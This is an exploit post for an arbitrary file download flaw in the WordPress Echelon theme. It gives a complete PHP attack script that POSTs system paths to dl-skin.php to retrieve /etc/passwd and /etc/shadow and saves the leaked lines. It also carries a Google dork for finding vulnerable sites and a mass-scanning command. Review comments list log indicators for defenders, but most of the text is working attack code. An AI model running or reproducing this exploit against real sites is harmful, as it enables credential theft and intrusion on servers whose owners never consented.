
File Submissions Exploit Wordpress A.F.D Theme Echelon

Author: Cleiton Pinheiro , Published: 30-03-2015
Name:
Wordpress A.F.D Theme Echelon / INURL - BRASIL

Description:
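This exploit allows an attacker to download any file on the server that the web server process can read (the original advisory says "writable", but a file download depends on read permission).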

Usage info:
Put the path of the file in the exploit's file field, then click the "Download" button; the file is returned directly in the response.

The script below requests /etc/passwd and /etc/shadow.

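The flaw is in how a $_POST parameter is handled: the script below uses it as the path of the file to send, apparently without restricting it to the theme's own skin files. Site owners running this theme should remove or block the script and review web logs for POST requests to it: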
/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
POST:
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download

Exploit:


<?php
/*
#===============================================================================
# NAME: Wordpress A.F.D Theme Echelon
# TIPE: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor: www.wordpress.org
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt
#
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
#
#
#------------------------------------------------------------------------------
# Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
#
#------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================
*/
// Runtime setup for a long-running command-line script.
// error_reporting(1) is E_ERROR only, so notices and warnings (for example the
// undefined variables used further down) are not reported.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
// NOTE(review): allow_url_fopen is normally changeable only in php.ini, so this
// call probably has no effect; the script performs its requests with cURL.
ini_set('allow_url_fopen', 1);
// Send output to the terminal as soon as it is printed.
ob_implicit_flush(true);
ob_end_flush();
// Stop with a usage message when no target was passed as the first argument.
print empty($argv[1]) ? exit("0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br\n") : NULL;
// Prefix "http://" unless the argument already contains the substring "http".
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
// Separator line used when printing and saving results.
$config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
// 'alvo' is Portuguese for "target": the base URL of the site being tested.
$config['alvo'] = $argv[1];
// Path of the theme script that serves the download. For defenders this path is
// the primary indicator: check whether it exists on your sites and whether it
// appears in access logs as the target of POST requests.
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";

/**
 * Flush pending output so progress messages appear immediately.
 *
 * Calls ob_flush() for PHP's output buffer and then flush() for the
 * system write buffer, in that order.
 */
function __plus()
{
    ob_flush();
    flush();
}

/**
 * Split a "key=value&key=value" string into an associative array.
 *
 * Keys are kept as written; each value is passed through urlencode().
 * Only the first two "="-separated pieces of every pair are used.
 *
 * @param string $query Pairs joined by "&".
 * @return array Map of key => URL-encoded value.
 */
function __convertUrlQuery($query)
{
    $params = array();

    foreach (explode('&', $query) as $pair) {
        list($key, $value) = explode('=', $pair);
        $params[$key] = urlencode($value);
    }

    return $params;
}

/**
 * Send one POST request to the theme's dl-skin.php and collect the response.
 *
 * The request body is "_mysite_download_skin=<URL-encoded $config['file']>&submit=Download".
 *
 * Log and WAF indicators produced by this function (all visible below):
 *  - POST to $config['alvo'] . $config['exploit'] (…/lib/scripts/dl-skin.php),
 *  - a "_mysite_download_skin" field holding an absolute filesystem path,
 *  - a Referer identical to the request URL,
 *  - a randomised User-Agent that always contains the literal "blog.inurl.com.br/".
 *
 * @param mixed $curl   cURL handle from curl_init(); closed before returning.
 * @param array $config Reads the keys 'file', 'alvo' and 'exploit'.
 * @return array|false  'corpo' (raw headers + body), 'server' (curl_getinfo()
 *                      result) and 'info' (one-line summary of selected headers).
 */
function __request_info($curl, $config) {
// Build the two form fields; values come back URL-encoded.
$postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
// NOTE(review): $postDados_format is appended to without being initialised;
// the resulting notice is hidden by error_reporting(1).
foreach ($postDados as $campo => $valor) {
$postDados_format .= $campo . '=' . ($valor) . '&';
}

// Drop the trailing "&" left by the loop.
$postDados_format = rtrim($postDados_format, '&');
// count($postDados) is used only as a truthy value to switch the request to POST.
curl_setopt($curl, CURLOPT_POST, count($postDados));
curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
// Version numbers are random per request, but "blog.inurl.com.br/" is constant.
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31');
curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
$config['exploit']);
// Certificate host-name checking is switched off; CURLOPT_SSL_VERIFYPEER is not
// changed here.
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
// Response headers are included in the returned string, so the regexes below
// (and any later matching on 'corpo') see headers as well as the body.
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$corpo = curl_exec($curl);
$server = curl_getinfo($curl);
$status = NULL;
// The patterns use "(" and ")" as delimiters; ".*" stops at the end of the line.
preg_match_all('(HTTP.*)', $corpo, $status['http']);
preg_match_all('(Server:.*)', $corpo, $status['server']);
preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']);
// First match of each header, joined into one line with CR/LF removed.
// When a header is absent the [0][0] index does not exist and contributes nothing.
$info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}"));
curl_close($curl);
unset($curl);
// NOTE(review): curl_exec() returns false on failure and isset(false) is true,
// so the FALSE branch is effectively unreachable; callers get 'corpo' => false.
return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;
}

/**
 * Decide whether a response looks like a leaked passwd-style file and report it.
 *
 * Lines starting at "root:", "sbin:", "ftp:", "nobody:" or "mail:" are collected
 * from $rest['corpo']. The verdict itself depends only on a case-insensitive
 * match for "root" anywhere in the response, which __request_info() returns
 * with headers included, so unrelated pages containing that word are also
 * reported as vulnerable. On a positive verdict the collected lines are
 * printed and appended to EXPLOIT_WPAFD_Echelon.txt.
 *
 * NOTE(review): the date format "h:m:s" prints hour:month:second ("m" is the
 * month in PHP's date()); minutes would be "i". Kept as in the original.
 *
 * @param array $config Reads the keys 'file', 'alvo' and 'line'.
 * @param array $rest   Result of __request_info(); only 'corpo' is read.
 * @return void
 */
function main($config, $rest)
{
    __plus();
    print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n";

    $body = $rest['corpo'];

    // Gather every matching line, pattern by pattern, in a fixed order.
    $_final = array();
    foreach (array("(root:.*)", "(sbin:.*)", "(ftp:.*)", "(nobody:.*)", "(mail:.*)") as $pattern) {
        preg_match_all($pattern, $body, $hits);
        $_final = array_merge($_final, $hits[0]);
    }

    if (!preg_match("#root#i", $body)) {
        print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
        return;
    }

    $res = "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
    $res .= $config['line'] . "\n";
    foreach ($_final as $value) {
        $res .= "0x " . date("h:m:s") . " [VALUE]: $value\n";
    }
    $res .= $config['line'];

    __plus();
    file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
    print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
}

// Script body: two requests against the same target, each checked by main().
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
// First request: /etc/passwd.
$config['file'] = '/etc/passwd';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
// NOTE(review): $line is never defined in this script (the separator lives in
// $config['line']), so this prints nothing.
print $line;
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config, $rest);
__plus();
// Second request: /etc/shadow. On typical Linux systems this file is readable
// only by root, so a successful read would also indicate that the web server
// process runs with more privilege than it should. main() still decides the
// verdict by looking for "root" in the response.
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config, $rest);
__plus();
